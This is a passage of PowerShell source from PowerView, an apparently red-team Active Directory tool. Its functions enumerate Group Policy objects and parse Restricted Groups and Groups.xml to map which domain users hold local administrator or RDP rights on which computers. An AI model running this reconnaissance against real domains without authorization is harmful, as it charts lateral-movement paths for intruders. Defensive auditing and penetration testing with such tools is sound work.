\"(&(objectCategory=groupPolicyContainer)$Filter)\"\n            Write-Verbose \"[Get-DomainGPO] filter string: $($Filter)\"\n\n            $Results = Invoke-LDAPQuery @SearcherArguments -LDAPFilter \"$Filter\"\n            $Results | Where-Object {$_} | ForEach-Object {\n                if ($PSBoundParameters['Raw']) {\n                    # return raw result objects\n                    $GPO = $_\n                    $GPO.PSObject.TypeNames.Insert(0, 'PowerView.GPO.Raw')\n                }\n                else {\n                    if (Get-Member -inputobject $_ -name \"Attributes\" -Membertype Properties) {\n                        $Prop = @{}\n                        foreach ($a in $_.Attributes.Keys | Sort-Object) {\n                            if (($a -eq 'objectsid') -or ($a -eq 'sidhistory') -or ($a -eq 'objectguid') -or ($a -eq 'usercertificate') -or ($a -eq 'ntsecuritydescriptor') -or ($a -eq 'logonhours')) {\n                                $Prop[$a] = $_.Attributes[$a]\n                            }\n                            else {\n                                $Values = @()\n                                foreach ($v in $_.Attributes[$a].GetValues([byte[]])) {\n                                    $Values += [System.Text.Encoding]::UTF8.GetString($v)\n                                }\n                                $Prop[$a] = $Values\n                            }\n                        }\n                    }\n                    else {\n                        $Prop = $_.Properties\n                    }\n\n                    if ($PSBoundParameters['SearchBase'] -and ($SearchBase -Match '^GC://')) {\n                        $GPO = Convert-LDAPProperty -Properties $Prop\n                        try {\n                            $GPODN = $GPO.distinguishedname\n                            $GPODomain = $GPODN.SubString($GPODN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'\n                            $gpcfilesyspath = \"\\\\$GPODomain\\SysVol\\$GPODomain\\Policies\\$($GPO.cn)\"\n                            $GPO | Add-Member Noteproperty 'gpcfilesyspath' $gpcfilesyspath\n                        }\n                        catch {\n                            Write-Verbose \"[Get-DomainGPO] Error calculating gpcfilesyspath for: $($GPO.distinguishedname)\"\n                        }\n                    }\n                    else {\n                        $GPO = Convert-LDAPProperty -Properties $Prop\n                    }\n                    $GPO.PSObject.TypeNames.Insert(0, 'PowerView.GPO')\n                }\n                $GPO\n            }\n            if ($Results) {\n                try { $Results.dispose() }\n                catch {\n                    Write-Verbose \"[Get-DomainGPO] Error disposing of the Results object: $_\"\n                }\n            }\n        }\n    }\n}\n\n\nfunction Get-DomainGPOLocalGroup {\n<#\n.SYNOPSIS\n\nReturns all GPOs in a domain that modify local group memberships through 'Restricted Groups'\nor Group Policy preferences. Also return their user membership mappings, if they exist.\n\nAuthor: @harmj0y  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainGPO, Get-GptTmpl, Get-GroupsXML, ConvertTo-SID, ConvertFrom-SID  \n\n.DESCRIPTION\n\nFirst enumerates all GPOs in the current/target domain using Get-DomainGPO with passed\narguments, and for each GPO checks if 'Restricted Groups' are set with GptTmpl.inf or\ngroup membership is set through Group Policy Preferences groups.xml files. For any\nGptTmpl.inf files found, the file is parsed with Get-GptTmpl and any 'Group Membership'\nsection data is processed if present. Any found Groups.xml files are parsed with\nGet-GroupsXML and those memberships are returned as well.\n\n.PARAMETER Identity\n\nA display name (e.g. 'Test GPO'), DistinguishedName (e.g. 'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'),\nGUID (e.g. '10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g. '{F260B76D-55C8-46C5-BEF1-9016DD98E272}'). Wildcards accepted.\n\n.PARAMETER ResolveMembersToSIDs\n\nSwitch. Indicates that any member names should be resolved to their domain SIDs.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nGet-DomainGPOLocalGroup\n\nReturns all local groups set by GPO along with their members and memberof.\n\n.EXAMPLE\n\nGet-DomainGPOLocalGroup -ResolveMembersToSIDs\n\nReturns all local groups set by GPO along with their members and memberof,\nand resolve any members to their domain SIDs.\n\n.EXAMPLE\n\n'{0847C615-6C4E-4D45-A064-6001040CC21C}' | Get-DomainGPOLocalGroup\n\nReturn any GPO-set groups for the GPO with the given name/GUID.\n\n.EXAMPLE\n\nGet-DomainGPOLocalGroup 'Desktops'\n\nReturn any GPO-set groups for the GPO with the given display name.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainGPOLocalGroup -Credential $Cred\n\n.LINK\n\nhttps://morgansimonsenblog.azurewebsites.net/tag/groups/\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.GPOGroup')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DistinguishedName', 'SamAccountName', 'Name')]\n        [String[]]\n        $Identity,\n\n        [Switch]\n        $ResolveMembersToSIDs,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        $SearcherArguments = @{}\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $Domain }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n\n        $ConvertArguments = @{}\n        if ($PSBoundParameters['Domain']) { $ConvertArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Server']) { $ConvertArguments['Server'] = $Server }\n        if ($PSBoundParameters['Credential']) { $ConvertArguments['Credential'] = $Credential }\n\n        $SplitOption = [System.StringSplitOptions]::RemoveEmptyEntries\n    }\n\n    PROCESS {\n        if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity }\n\n        Get-DomainGPO @SearcherArguments | ForEach-Object {\n            $GPOdisplayName = $_.displayname\n            $GPOname = $_.name\n            $GPOPath = $_.gpcfilesyspath\n\n            $ParseArgs =  @{ 'GptTmplPath' = \"$GPOPath\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf\" }\n            if ($PSBoundParameters['Credential']) { $ParseArgs['Credential'] = $Credential }\n\n            # first parse the 'Restricted Groups' file (GptTmpl.inf) if it exists\n            $Inf = Get-GptTmpl @ParseArgs\n\n            if ($Inf -and ($Inf.psbase.Keys -contains 'Group Membership')) {\n                $Memberships = @{}\n\n                # parse the members/memberof fields for each entry\n                ForEach ($Membership in $Inf.'Group Membership'.GetEnumerator()) {\n                    $Group, $Relation = $Membership.Key.Split('__', $SplitOption) | ForEach-Object {$_.Trim()}\n                    # extract out ALL members\n                    $MembershipValue = $Membership.Value | Where-Object {$_} | ForEach-Object { $_.Trim('*') } | Where-Object {$_}\n\n                    if ($PSBoundParameters['ResolveMembersToSIDs']) {\n                        # if the resulting member is username and not a SID, attempt to resolve it\n                        $GroupMembers = @()\n                        ForEach ($Member in $MembershipValue) {\n                            if ($Member -and ($Member.Trim() -ne '')) {\n                                if ($Member -notmatch '^S-1-.*') {\n                                    $ConvertToArguments = @{'ObjectName' = $Member}\n                                    if ($PSBoundParameters['Domain']) { $ConvertToArguments['Domain'] = $Domain }\n                                    $MemberSID = ConvertTo-SID @ConvertToArguments\n\n                                    if ($MemberSID) {\n                                        $GroupMembers += $MemberSID\n                                    }\n                                    else {\n                                        $GroupMembers += $Member\n                                    }\n                                }\n                                else {\n                                    $GroupMembers += $Member\n                                }\n                            }\n                        }\n                        $MembershipValue = $GroupMembers\n                    }\n\n                    if (-not $Memberships[$Group]) {\n                        $Memberships[$Group] = @{}\n                    }\n                    if ($MembershipValue -isnot [System.Array]) {$MembershipValue = @($MembershipValue)}\n                    $Memberships[$Group].Add($Relation, $MembershipValue)\n                }\n\n                ForEach ($Membership in $Memberships.GetEnumerator()) {\n                    if ($Membership -and $Membership.Key -and ($Membership.Key -match '^\\*')) {\n                        # if the SID is already resolved (i.e. begins with *) try to resolve SID to a name\n                        $GroupSID = $Membership.Key.Trim('*')\n                        if ($GroupSID -and ($GroupSID.Trim() -ne '')) {\n                            $GroupName = ConvertFrom-SID -ObjectSID $GroupSID @ConvertArguments\n                        }\n                        else {\n                            $GroupName = $False\n                        }\n                    }\n                    else {\n                        $GroupName = $Membership.Key\n\n                        if ($GroupName -and ($GroupName.Trim() -ne '')) {\n                            if ($Groupname -match 'Administrators') {\n                                $GroupSID = 'S-1-5-32-544'\n                            }\n                            elseif ($Groupname -match 'Remote Desktop') {\n                                $GroupSID = 'S-1-5-32-555'\n                            }\n                            elseif ($Groupname -match 'Guests') {\n                                $GroupSID = 'S-1-5-32-546'\n                            }\n                            elseif ($GroupName.Trim() -ne '') {\n                                $ConvertToArguments = @{'ObjectName' = $Groupname}\n                                if ($PSBoundParameters['Domain']) { $ConvertToArguments['Domain'] = $Domain }\n                                $GroupSID = ConvertTo-SID @ConvertToArguments\n                            }\n                            else {\n                                $GroupSID = $Null\n                            }\n                        }\n                    }\n\n                    $GPOGroup = New-Object PSObject\n                    $GPOGroup | Add-Member Noteproperty 'GPODisplayName' $GPODisplayName\n                    $GPOGroup | Add-Member Noteproperty 'GPOName' $GPOName\n                    $GPOGroup | Add-Member Noteproperty 'GPOPath' $GPOPath\n                    $GPOGroup | Add-Member Noteproperty 'GPOType' 'RestrictedGroups'\n                    $GPOGroup | Add-Member Noteproperty 'Filters' $Null\n                    $GPOGroup | Add-Member Noteproperty 'GroupName' $GroupName\n                    $GPOGroup | Add-Member Noteproperty 'GroupSID' $GroupSID\n                    $GPOGroup | Add-Member Noteproperty 'GroupMemberOf' $Membership.Value.Memberof\n                    $GPOGroup | Add-Member Noteproperty 'GroupMembers' $Membership.Value.Members\n                    $GPOGroup.PSObject.TypeNames.Insert(0, 'PowerView.GPOGroup')\n                    $GPOGroup\n                }\n            }\n\n            # now try to the parse group policy preferences file (Groups.xml) if it exists\n            $ParseArgs =  @{\n                'GroupsXMLpath' = \"$GPOPath\\MACHINE\\Preferences\\Groups\\Groups.xml\"\n            }\n\n            Get-GroupsXML @ParseArgs | ForEach-Object {\n                if ($PSBoundParameters['ResolveMembersToSIDs']) {\n                    $GroupMembers = @()\n                    ForEach ($Member in $_.GroupMembers) {\n                        if ($Member -and ($Member.Trim() -ne '')) {\n                            if ($Member -notmatch '^S-1-.*') {\n\n                                # if the resulting member is username and not a SID, attempt to resolve it\n                                $ConvertToArguments = @{'ObjectName' = $Groupname}\n                                if ($PSBoundParameters['Domain']) { $ConvertToArguments['Domain'] = $Domain }\n                                $MemberSID = ConvertTo-SID -Domain $Domain -ObjectName $Member\n\n                                if ($MemberSID) {\n                                    $GroupMembers += $MemberSID\n                                }\n                                else {\n                                    $GroupMembers += $Member\n                                }\n                            }\n                            else {\n                                $GroupMembers += $Member\n                            }\n                        }\n                    }\n                    $_.GroupMembers = $GroupMembers\n                }\n\n                $_ | Add-Member Noteproperty 'GPODisplayName' $GPODisplayName\n                $_ | Add-Member Noteproperty 'GPOName' $GPOName\n                $_ | Add-Member Noteproperty 'GPOType' 'GroupPolicyPreferences'\n                $_.PSObject.TypeNames.Insert(0, 'PowerView.GPOGroup')\n                $_\n            }\n        }\n    }\n}\n\n\nfunction Get-DomainGPOUserLocalGroupMapping {\n<#\n.SYNOPSIS\n\nEnumerates the machines where a specific domain user/group is a member of a specific\nlocal group, all through GPO correlation. If no user/group is specified, all\ndiscoverable mappings are returned.\n\nAuthor: @harmj0y  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainGPOLocalGroup, Get-DomainObject, Get-DomainComputer, Get-DomainOU, Get-DomainSite, Get-DomainGroup  \n\n.DESCRIPTION\n\nTakes a user/group name and optional domain, and determines the computers in the domain\nthe user/group has local admin (or RDP) rights to.\n\nIt does this by:\n    1.  resolving the user/group to its proper SID\n    2.  enumerating all groups the user/group is a current part of\n        and extracting all target SIDs to build a target SID list\n    3.  pulling all GPOs that set 'Restricted Groups' or Groups.xml by calling\n        Get-DomainGPOLocalGroup\n    4.  matching the target SID list to the queried GPO SID list\n        to enumerate all GPO the user is effectively applied with\n    5.  enumerating all OUs and sites and applicable GPO GUIs are\n        applied to through gplink enumerating\n    6.  querying for all computers under the given OUs or sites\n\nIf no user/group is specified, all user/group -> machine mappings discovered through\nGPO relationships are returned.\n\n.PARAMETER Identity\n\nA SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)\nfor the user/group to identity GPO local group mappings for.\n\n.PARAMETER LocalGroup\n\nThe local group to check access against.\nCan be \"Administrators\" (S-1-5-32-544), \"RDP/Remote Desktop Users\" (S-1-5-32-555),\nor a custom local SID. Defaults to local 'Administrators'.\n\n.PARAMETER Domain\n\nSpecifies the domain to enumerate GPOs for, defaults to the current domain.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nGet-DomainGPOUserLocalGroupMapping\n\nFind all user/group -> machine relationships where the user/group is a member\nof the local administrators group on target machines.\n\n.EXAMPLE\n\nGet-DomainGPOUserLocalGroupMapping -Identity dfm -Domain dev.testlab.local\n\nFind all computers that dfm user has local administrator rights to in\nthe dev.testlab.local domain.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainGPOUserLocalGroupMapping -Credential $Cred\n\n.OUTPUTS\n\nPowerView.GPOLocalGroupMapping\n\nA custom PSObject containing any target identity information and what local\ngroup memberships they're a part of through GPO correlation.\n\n.LINK\n\nhttp://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.GPOUserLocalGroupMapping')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DistinguishedName', 'SamAccountName', 'Name')]\n        [String]\n        $Identity,\n\n        [String]\n        [ValidateSet('Administrators', 'S-1-5-32-544', 'RDP', 'Remote Desktop Users', 'S-1-5-32-555')]\n        $LocalGroup = 'Administrators',\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        $CommonArguments = @{}\n        if ($PSBoundParameters['Domain']) { $CommonArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Server']) { $CommonArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $CommonArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $CommonArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $CommonArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $CommonArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $CommonArguments['Credential'] = $Credential }\n    }\n\n    PROCESS {\n        $TargetSIDs = @()\n\n        if ($PSBoundParameters['Identity']) {\n            $TargetSIDs += Get-DomainObject @CommonArguments -Identity $Identity | Select-Object -Expand objectsid\n            $TargetObjectSID = $TargetSIDs\n            if (-not $TargetSIDs) {\n                Throw \"[Get-DomainGPOUserLocalGroupMapping] Unable to retrieve SID for identity '$Identity'\"\n            }\n        }\n        else {\n            # no filtering/match all\n            $TargetSIDs = @('*')\n        }\n\n        if ($LocalGroup -match 'S-1-5') {\n            $TargetLocalSID = $LocalGroup\n        }\n        elseif ($LocalGroup -match 'Admin') {\n            $TargetLocalSID = 'S-1-5-32-544'\n        }\n        else {\n            # RDP\n            $TargetLocalSID = 'S-1-5-32-555'\n        }\n\n        if ($TargetSIDs[0] -ne '*') {\n            ForEach ($TargetSid in $TargetSids) {\n                Write-Verbose \"[Get-DomainGPOUserLocalGroupMapping] Enumerating nested group memberships for: '$TargetSid'\"\n                $TargetSIDs += Get-DomainGroup @CommonArguments -Properties 'objectsid' -MemberIdentity $TargetSid | Select-Object -ExpandProperty objectsid\n            }\n        }\n\n        Write-Verbose \"[Get-DomainGPOUserLocalGroupMapping] Target localgroup SID: $TargetLocalSID\"\n        Write-Verbose \"[Get-DomainGPOUserLocalGroupMapping] Effective target domain SIDs: $TargetSIDs\"\n\n        $GPOgroups = Get-DomainGPOLocalGroup @CommonArguments -ResolveMembersToSIDs | ForEach-Object {\n            $GPOgroup = $_\n            # if the locally set group is what we're looking for, check the GroupMembers ('members') for our target SID\n            if ($GPOgroup.GroupSID -match $TargetLocalSID) {\n                $GPOgroup.GroupMembers | Where-Object {$_} | ForEach-Object {\n                    if ( ($TargetSIDs[0] -eq '*') -or ($TargetSIDs -Contains $_) ) {\n                        $GPOgroup\n                    }\n                }\n            }\n            # if the group is a 'memberof' the group we're looking for, check GroupSID against the targt SIDs\n            if ( ($GPOgroup.GroupMemberOf -contains $TargetLocalSID) ) {\n                if ( ($TargetSIDs[0] -eq '*') -or ($TargetSIDs -Contains $GPOgroup.GroupSID) ) {\n                    $GPOgroup\n                }\n            }\n        } | Sort-Object -Property GPOName -Unique\n\n        $GPOgroups | Where-Object {$_} | ForEach-Object {\n            $GPOname = $_.GPODisplayName\n            $GPOguid = $_.GPOName\n            $GPOPath = $_.GPOPath\n            $GPOType = $_.GPOType\n            if ($_.GroupMembers) {\n                $GPOMembers = $_.GroupMembers\n            }\n            else {\n                $GPOMembers = $_.GroupSID\n            }\n\n            $Filters = $_.Filters\n\n            if ($TargetSIDs[0] -eq '*') {\n                # if the * wildcard was used, set the targets to all GPO members so everything it output\n                $TargetObjectSIDs = $GPOMembers\n            }\n            else {\n                $TargetObjectSIDs = $TargetObjectSID\n            }\n\n            # find any OUs that have this GPO linked through gpLink\n            Get-DomainOU @CommonArguments -Raw -Properties 'name,distinguishedname' -GPLink $GPOGuid | ForEach-Object {\n                if ($Filters) {\n                    $OUComputers = Get-DomainComputer @CommonArguments -Properties 'dnshostname,distinguishedname' -SearchBase $_.Path | Where-Object {$_.distinguishedname -match ($Filters.Value)} | Select-Object -ExpandProperty dnshostname\n                }\n                else {\n                    $OUComputers = Get-DomainComputer @CommonArguments -Properties 'dnshostname' -SearchBase $_.Path | Select-Object -ExpandProperty dnshostname\n                }\n\n                if ($OUComputers) {\n                    if ($OUComputers -isnot [System.Array]) {$OUComputers = @($OUComputers)}\n\n                    ForEach ($TargetSid in $TargetObjectSIDs) {\n                        $Object = Get-DomainObject @CommonArguments -Identity $TargetSid -Properties 'samaccounttype,samaccountname,distinguishedname,objectsid'\n\n                        $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype\n\n                        $GPOLocalGroupMapping = New-Object PSObject\n                        $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectName' $Object.samaccountname\n                        $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname\n                        $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectSID' $Object.objectsid\n                        $GPOLocalGroupMapping | Add-Member Noteproperty 'Domain' $Domain\n                        $GPOLocalGroupMapping | Add-Member Noteproperty 'IsGroup' $IsGroup\n                        $GPOLocalGroupMapping | Add-Member Noteproperty 'GPODisplayName' $GPOname\n                        $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOGuid' $GPOGuid\n                        $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOPath' $GPOPath\n                        $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOType' $GPOType\n                        $GPOLocalGroupMapping | Add-Member Noteproperty 'ContainerName' $_.Properties.distinguishedname\n                        $GPOLocalGroupMapping | Add-Member Noteproperty 'ComputerName' $OUComputers\n                        $GPOLocalGroupMapping.PSObject.TypeNames.Insert(0, 'PowerView.GPOLocalGroupMapping')\n                        $GPOLocalGroupMapping\n                    }\n                }\n            }\n\n            # find any sites that have this GPO linked through gpLink\n            Get-DomainSite @CommonArguments -Properties 'siteobjectbl,distinguishedname' -GPLink $GPOGuid | ForEach-Object {\n                ForEach ($TargetSid in $TargetObjectSIDs) {\n                    $Object = Get-DomainObject @CommonArguments -Identity $TargetSid -Properties 'samaccounttype,samaccountname,distinguishedname,objectsid'\n\n                    $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype\n\n                    $GPOLocalGroupMapping = New-Object PSObject\n                    $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectName' $Object.samaccountname\n                    $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname\n                    $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectSID' $Object.objectsid\n                    $GPOLocalGroupMapping | Add-Member Noteproperty 'IsGroup' $IsGroup\n                    $GPOLocalGroupMapping | Add-Member Noteproperty 'Domain' $Domain\n                    $GPOLocalGroupMapping | Add-Member Noteproperty 'GPODisplayName' $GPOname\n                    $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOGuid' $GPOGuid\n                    $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOPath' $GPOPath\n                    $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOType' $GPOType\n                    $GPOLocalGroupMapping | Add-Member Noteproperty 'ContainerName' $_.distinguishedname\n                    $GPOLocalGroupMapping | Add-Member Noteproperty 'ComputerName' $_.siteobjectbl\n                    $GPOLocalGroupMapping.PSObject.TypeNames.Add('PowerView.GPOLocalGroupMapping')\n                    $GPOLocalGroupMapping\n                }\n            }\n        }\n    }\n}\n\n\nfunction Get-DomainGPOComputerLocalGroupMapping {\n<#\n.SYNOPSIS\n\nTakes a computer (or GPO) object and determines what users/groups are in the specified\nlocal group for the machine through GPO correlation.\n\nAuthor: @harmj0y  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainComputer, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainGPOLocalGroup  \n\n.DESCRIPTION\n\nThis function is the inverse of Get-DomainGPOUserLocalGroupMapping, and finds what users/groups\nare in the specified local group for a target machine through GPO correlation.\n\nIf a -ComputerIdentity is specified, retrieve the complete computer object, attempt to\ndetermine the OU the computer is a part of. Then resolve the computer's site name with\nGet-NetComputerSiteName and retrieve all sites object Get-DomainSite. For those results, attempt to\nenumerate all linked GPOs and associated local group settings with Get-DomainGPOLocalGroup. For\neach resulting GPO group, resolve the resulting user/group name to a full AD object and\nreturn the results. This will return the domain objects that are members of the specified\n-LocalGroup for the given computer.\n\nOtherwise, if -OUIdentity is supplied, the same process is executed to find linked GPOs and\nlocalgroup specifications.\n\n.PARAMETER ComputerIdentity\n\nA SamAccountName (e.g. WINDOWS10$), DistinguishedName (e.g. CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. 4f16b6bc-7010-4cbf-b628-f3cfe20f6994),\nor a dns host name (e.g. windows10.testlab.local) for the computer to identity GPO local group mappings for.\n\n.PARAMETER OUIdentity\n\nAn OU name (e.g. TestOU), DistinguishedName (e.g. OU=TestOU,DC=testlab,DC=local), or\nGUID (e.g. 8a9ba22a-8977-47e6-84ce-8c26af4e1e6a) for the OU to identity GPO local group mappings for.\n\n.PARAMETER LocalGroup\n\nThe local group to check access against.\nCan be \"Administrators\" (S-1-5-32-544), \"RDP/Remote Desktop Users\" (S-1-5-32-555),\nor a custom local SID. Defaults to local 'Administrators'.\n\n.PARAMETER Domain\n\nSpecifies the domain to enumerate GPOs for, defaults to the current domain.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nGet-DomainGPOComputerLocalGroupMapping -ComputerName WINDOWS3.testlab.local\n\nFinds users who have local admin rights over WINDOWS3 through GPO correlation.\n\n.EXAMPLE\n\nGet-DomainGPOComputerLocalGroupMapping -Domain dev.testlab.local -ComputerName WINDOWS4.dev.testlab.local -LocalGroup RDP\n\nFinds users who have RDP rights over WINDOWS4 through GPO correlation.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainGPOComputerLocalGroupMapping -Credential $Cred -ComputerIdentity SQL.testlab.local\n\n.OUTPUTS\n\nPowerView.GGPOComputerLocalGroupMember\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.GGPOComputerLocalGroupMember')]\n    [CmdletBinding(DefaultParameterSetName = 'ComputerIdentity')]\n    Param(\n        [Parameter(Position = 0, ParameterSetName = 'ComputerIdentity', Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('ComputerName', 'Computer', 'DistinguishedName', 'SamAccountName', 'Name')]\n        [String]\n        $ComputerIdentity,\n\n        [Parameter(Mandatory = $True, ParameterSetName = 'OUIdentity')]\n        [Alias('OU')]\n        [String]\n        $OUIdentity,\n\n        [String]\n        [ValidateSet('Administrators', 'S-1-5-32-544', 'RDP', 'Remote Desktop Users', 'S-1-5-32-555')]\n        $LocalGroup = 'Administrators',\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = 